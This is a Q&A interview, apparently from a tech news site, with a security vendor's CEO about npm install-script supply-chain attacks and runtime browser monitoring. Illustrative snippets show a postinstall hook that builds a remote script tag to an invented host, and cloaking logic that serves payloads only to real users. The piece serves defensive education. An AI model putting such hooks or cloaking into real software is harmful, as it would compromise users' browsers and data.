How attackers are weaponizing open-source package managers [Q&A]

A new wave of attacks is hitting the JavaScript package ecosystem, specifically through open-source package managers like npm. Instead of hiding malicious code in the package itself, attackers now weaponize the install process: the code looks clean at build time but later executes in end users’ browsers, where it quietly steals data.

We talked to Simon Wijckmans, CEO at the client-side security and intelligence platform cside, to understand why this is happening and how organizations can respond.

BN: Why are attackers shifting from malicious packages to weaponizing the NPM install process, and what makes this tactic so effective?

SW: Attackers are realizing that patience can pay off better than brute force. So instead of shipping packages that are overtly malicious (and that security scanners can flag immediately), they’re now targeting the npm install process itself, with install scripts that look completely innocuous.

What makes this all particularly effective is timing. These scripts activate during the build process. They make a simple network request to fetch what appears to be legitimate JavaScript code. So, your security team has already scanned the package, found nothing suspicious, and moved on. But the moment your application builds and ships to production…boom, that innocuous code transforms. It injects new script tags directly into your users’ browsers, creating a backdoor that traditional security tools never saw coming.
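To make the mechanism concrete, here is a minimal, hypothetical sketch of the pattern described above: a single lifecycle hook in package.json runs a script at install time, and that script assembles a remote script tag destined for the shipped bundle. The package name, file path, and the `cdn.example-telemetry.com` domain are all invented for illustration, not taken from a real attack.

```javascript
// Hypothetical illustration only. In package.json, one line is enough to
// run arbitrary code during `npm install`:
//
//   "scripts": { "postinstall": "node ./scripts/setup.js" }
//
// The script it runs can look like routine build configuration. The string
// it assembles is a remote <script> tag that ends up in the built bundle.

function buildInjectedTag(remoteHost) {
  // No eval, no obfuscation, no known-bad signature: just string
  // concatenation whose meaning only becomes apparent in the browser.
  return `<script src="https://${remoteHost}/v1/loader.js" async></script>`;
}

// "cdn.example-telemetry.com" is a made-up domain for this sketch.
const tag = buildInjectedTag("cdn.example-telemetry.com");
console.log(tag);
```

Nothing in a snippet like this would trip a signature-based scanner at package review time; the actual payload lives behind `loader.js` and is fetched only after the application ships.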

BN: How do these attacks manage to bypass traditional security scanning and monitoring, and why are client-side environments such a blind spot?

SW: The attacks bypass security by exploiting fundamental design flaws in how most security tools work. SAST solutions won’t help here because the code only activates during builds. Snyk and similar tools flag known vulnerabilities, but that’s irrelevant when the malicious payload downloads dynamically. Web application firewalls monitor server traffic beautifully, but they’re blind to client-side execution.

In short, client-side environments are a blind spot because JavaScript delivery is dynamic by design. Take a marketing tool that serves different script versions based on browser type or user location. That’s normal behavior, but it’s also the perfect opportunity for attackers. They leverage these same dynamics to avoid detection, serving malicious code only to real users while security tools see nothing wrong.
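A rough sketch of the cloaking logic just described: serve clean code to anything that looks like a scanner, and the real payload only to what looks like an ordinary browser. The filenames, user-agent patterns, and IP prefixes below are illustrative assumptions, not details from any specific attack.

```javascript
// Hypothetical server-side cloaking logic, as an attacker might run it.
const SCANNER_PATTERNS = [/headlesschrome/i, /bot|crawler|spider|scan/i];
// Prefixes loosely associated with cloud-hosted scanners (illustrative).
const CLOUD_IP_PREFIXES = ["34.", "35.", "52."];

function selectPayload(userAgent, clientIp) {
  const looksAutomated =
    SCANNER_PATTERNS.some((re) => re.test(userAgent)) ||
    CLOUD_IP_PREFIXES.some((prefix) => clientIp.startsWith(prefix));
  // Security tooling gets the clean file; real users get the payload.
  return looksAutomated ? "analytics.clean.js" : "analytics.payload.js";
}
```

This is why a crawler-based scan can come back clean while real visitors are being compromised: the attacker decides per-request which code to serve.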

BN: What’s the scale of potential impact? Are we talking hundreds of sites or hundreds of thousands?

SW: We’re talking hundreds of thousands of websites, at minimum, potentially running compromised code right now through popular services. Most security teams have absolutely no idea because they’re looking in all the wrong places.

When a single compromised package can affect that many websites simultaneously, the financial carnage multiplies exponentially. IBM’s recent research puts the average cost of a data breach at $4.4 million, but supply chain attacks like these carry premium price tags due to their extensive reach and complex remediation requirements. This isn’t a targeted attack on a single company, but a blast radius that can span entire ecosystems.

BN: How should enterprises reframe their security strategies when the real danger begins only after code ships to the browser?

SW: Enterprises need a fundamental shift in perspective. There’s still a dangerous assumption that scanning for what malicious code looks like is sufficient. But modern npm attacks don’t play by those rules. They create attack chains that phase-shift across environments, appearing harmless at each checkpoint while building toward a devastating final payload.

The solution requires moving from static scanning to behavioral analysis. Instead of only scanning for malicious code signatures, security teams need systems that monitor what malicious code actually does. So when a seemingly innocent analytics script suddenly starts accessing payment forms or making unauthorized network requests, you need intelligent systems that can detect and block that activity before any damage occurs.

You also cannot rely on crawlers or agents alone. Those tools are easily bypassed because attackers can detect them and serve clean code. You need to intercept and inspect the actual JavaScript that real users receive (not what your security crawler sees). Security simply cannot end when code ships, because it’s become very clear that’s actually when the real monitoring needs to begin.

BN: Do these attacks represent a new phase in supply-chain exploitation similar in significance to the high-profile SolarWinds or Log4j attacks?

SW: I’d argue these attacks make the SolarWinds attack look almost quaint by comparison. What we’re seeing isn’t a set of isolated security failures but a shift in how attackers think about supply chain exploitation. Threat actors are now building attack chains designed specifically to evade detection at every traditional checkpoint, exploiting the gaps between development-time security scanning and runtime execution. As software development becomes increasingly dependent on complex package ecosystems and intricate build processes, those gaps are only widening. This is absolutely an accelerating arms race.

BN: What kinds of monitoring or detection approaches actually work against dynamically-assembled, runtime threats like this?

SW: Traditional security approaches assume a linear attack model where malicious code gets written, distributed, and executed in predictable ways. These attacks don’t follow those assumptions, so you need monitoring that doesn’t either.

The key is that you cannot rely on tools that attackers can easily detect and bypass. Crawlers, for example, are fundamentally flawed for this purpose (they visit from cloud provider IPs, and attackers can serve them clean code while delivering malicious payloads to real users). When the Polyfill attack happened last year, it took threat intelligence vendors over 30 hours to flag it, even with widespread press coverage. By that time, the damage was done.

What actually works is intercepting the real JavaScript that users receive and analyzing it in real-time. You need to establish baselines for normal behavior and immediately flag deviations (such as when code starts accessing sensitive data, making unauthorized network calls, or injecting unexpected elements into the DOM).

The critical difference is between a strategy that hopes malicious code will trigger its traps and systems that actually inspect the payload before it executes. Comprehensive monitoring across the entire application lifecycle is essential, not just at build time or just on the server. You need visibility into what’s actually executing in users’ browsers, because that’s where these attacks ultimately succeed or fail.
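As a rough illustration of the baselining idea, the sketch below keeps an allowlist of hosts a page is expected to contact and flags any request outside it. In a real deployment this check would sit in the delivery path or hook the browser’s fetch/XHR machinery; here it is a plain function, with invented hostnames, so the logic is easy to follow.

```javascript
// Hypothetical baseline of hosts this page legitimately talks to.
const baseline = new Set(["api.example.com", "cdn.example.com"]);

function checkRequest(url) {
  // Compare only the hostname: an exfiltration endpoint on an unknown
  // host is the deviation we want to catch.
  const host = new URL(url).hostname;
  return baseline.has(host) ? "allow" : "flag";
}
```

A production system would also baseline DOM mutations and data access, not just network destinations, but the principle is the same: define normal, then treat deviations as signal.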

BN: Looking ahead, what changes do you expect in attacker behavior as they continue to exploit gaps between development, build, and runtime environments?

SW: Attackers have discovered that the gaps between development, build, and runtime create perfect hiding spots for sophisticated threats. I expect we’ll see increasingly sophisticated attack chains that are even more distributed across these environments, making them harder to detect with any single tool or approach.

We’ll likely see more and more headline-triggering attacks that look completely legitimate at every individual checkpoint but assemble into something malicious only when all the pieces come together in the browser. Attackers will continue exploiting the fact that most security teams still think in silos (e.g. development security, infrastructure security, application security) rather than thinking about the entire execution chain.

They’ll also continue to exploit the dynamic nature of JavaScript delivery. As security tools try to keep up, attackers will get better at fingerprinting non-human requests and serving them clean code. It’s going to become an ever-more-sophisticated cat-and-mouse game.

But I strongly believe security teams that recognize this evolution now and implement comprehensive monitoring across the full lifecycle (with systems that can’t be easily detected and bypassed) will have a significant advantage. They’ll be able to detect threats that bypass every traditional security tool and protect customers when their competitors cannot. That said, the window to get ahead of this is closing fast.

Image credit: nomadsoul1/depositphotos.com
